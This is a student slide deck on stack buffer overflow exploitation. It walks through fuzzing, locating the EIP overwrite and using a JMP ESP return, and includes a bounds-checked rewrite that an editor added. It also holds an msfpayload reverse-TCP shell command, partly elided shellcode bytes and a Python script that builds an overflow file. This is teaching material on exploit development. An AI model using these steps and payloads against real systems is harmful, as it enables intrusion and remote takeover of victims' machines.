smash the stack, Menna Essa

Published on twentyCAT event 14/5/2011
Published in: Technology

Smash The Stack! By: @MennaEssa, FCIS Student, 2nd year.

Agenda
- Theory
- Steps: 1. Find a bug; 2. Verify the bug; 3. Finalize and use the shell code
- View from above
- Exploit development?

What is a buffer? A buffer overflow? Smashing the stack? So the theory is ==>
The Theory:

```c
#include <string.h>

/* Copies the caller-supplied Buffer into a fixed 128-byte stack array with
 * no length check, so any longer input overruns MyVar on the stack. */
void do_something(char *Buffer)
{
    char MyVar[128];
    strcpy(MyVar, Buffer);
}

int main(int argc, char **argv)
{
    do_something(argv[1]);
    return 0;
}
```
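The defect on the theory slide beside a bounded replacement, as an added example that is not part of the original deck. The names `do_something_unsafe`, `do_something_safe`, `accepts_input_of_length` and the constant `MYVAR_SIZE` are assumptions chosen for this example; the 128-byte buffer and the strcpy() pattern are the slide's own. The hardened version measures the input within the space it actually has, refuses anything that cannot fit together with its terminator, and only then copies a bounded number of bytes, so an oversized input (the deck's 'A' * N fuzzing case) is rejected instead of overwriting the saved return address.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MYVAR_SIZE 128   /* same 128-byte stack buffer as the theory slide */

/* The defect from the theory slide: strcpy() stops only at Buffer's NUL
 * terminator, so an input of 128 bytes or more writes past MyVar into the
 * saved frame pointer and return address above it on the stack.
 * Kept for comparison only; nothing in this file calls it. */
void do_something_unsafe(char *Buffer)
{
    char MyVar[MYVAR_SIZE];
    strcpy(MyVar, Buffer);
    (void)MyVar;
}

/* Hardened form (assumed name): look for the terminator only within the
 * space MyVar has, refuse input that cannot fit together with its NUL, then
 * copy a bounded number of bytes. Returns 0 on success and -1 with
 * errno = E2BIG when the input is too long, so the caller fails closed
 * instead of silently corrupting the stack. */
int do_something_safe(const char *Buffer)
{
    char MyVar[MYVAR_SIZE];
    /* memchr never reads more than MYVAR_SIZE bytes of Buffer */
    const char *end = memchr(Buffer, '\0', MYVAR_SIZE);
    if (end == NULL) {            /* no NUL in the first 128 bytes: does not fit */
        errno = E2BIG;
        return -1;
    }
    size_t len = (size_t)(end - Buffer);
    memcpy(MyVar, Buffer, len + 1);   /* bounded copy, terminator included */
    /* ... work with MyVar here ... */
    return 0;
}

/* Test helper (assumed name): builds a constructed input of n bytes of 'A'
 * plus a NUL, like the deck's 'A' * N input, and reports whether the
 * hardened function accepts it (0) or rejects it (-1). */
int accepts_input_of_length(size_t n)
{
    char *buf = malloc(n + 1);
    if (buf == NULL)
        return -1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    int rc = do_something_safe(buf);
    free(buf);
    return rc;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (do_something_safe(argv[1]) != 0) {
        fprintf(stderr, "rejected: input longer than %d bytes\n", MYVAR_SIZE - 1);
        return 2;
    }
    puts("accepted");
    return 0;
}
```

Compile it with `cc -o check check.c` and run it with a short and with a very long argument: the first is accepted, the second is rejected with a clear error rather than a crash. The point of the design is that the length decision happens before any byte is written, and the copy that follows can never exceed what was checked.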
Step 1: Find the bug. Got the source code? Awesome! No? Reversing (fuzzing): simply, you can keep giving the program inputs of increasing sizes until it crashes.

Step 2: Verify the bug. Where is the EIP? Use a debugger to guide yourself. Use different inputs to narrow the range of your expectations. Use unique patterns to find exactly where the EIP overwrite is:

```
./pattern_create.rb <size>
./pattern_offset.rb <data written in EIP> <size>
```

You've got the EIP... Sweet!

Now what? Now that you have the EIP, you should be able to overwrite it with an address where you have your evil (no?) code. We call this the shell code: a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. Ok... WHERE!

Where? Remember when you overwrote your EIP? Why not use the rest of the buffer to put it there, right where the ESP is pointing? EIP ==> ESP: "DMA? nope!" Use a jump op (JMP ESP) from one of the DLLs... Google some resources for that ;)

Get the shell code. Now you control the EIP; now where to put your shell code:

```
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 C
```
Greet the shell code :)

```c
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
/* ... middle of the payload elided on the original slide ... */
"\x0f\xdf\xe0\xff\xd5\x97\x6a"
"\x05\x68\xc0\xa8\x01\x70\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10"
"\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e"
"\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56"
"\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10"
"\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a"
"\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6"
"\x85\xf6\x75\xec\xc3";
```
Finalize:

```python
#!/usr/bin/env python
# Python 2 script as on the slide; the byte escapes are written as str literals.
some_file = 'output.bin'  # placeholder name: the file the target program will read
buff = 'A' * 26072
buff += '\x3a\xf2\xa8\x01'  # EIP overwrite: JMP ESP address
buff += 'CCCC'              # 4 bytes of garbage
buff += ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
         "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
         "\x31\xc0\xac\x3c.....")  # your shellcode (truncated on the slide)
f = open(some_file, 'wb')  # whatever; this is how it becomes an input to the program
f.write(buff)
f.close()
```
Now add it to your code and you're done. Winamp remote buffer overflow exploit: live demo. [This flaw is triggered when an audio file path is specified, inside a playlist, that consists of a UNC path with a long computer name. This module delivers the playlist via the browser.]

The look from above... Exploit development, security researchers: we need more of them here :) Remember to know how. You can find some neat tutorials on isecurity, corelanec0d3r.

~# Thanks_